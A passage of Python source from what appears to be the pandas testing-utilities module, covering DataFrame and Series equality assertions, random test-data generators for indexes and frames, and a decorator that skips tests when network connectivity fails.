5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
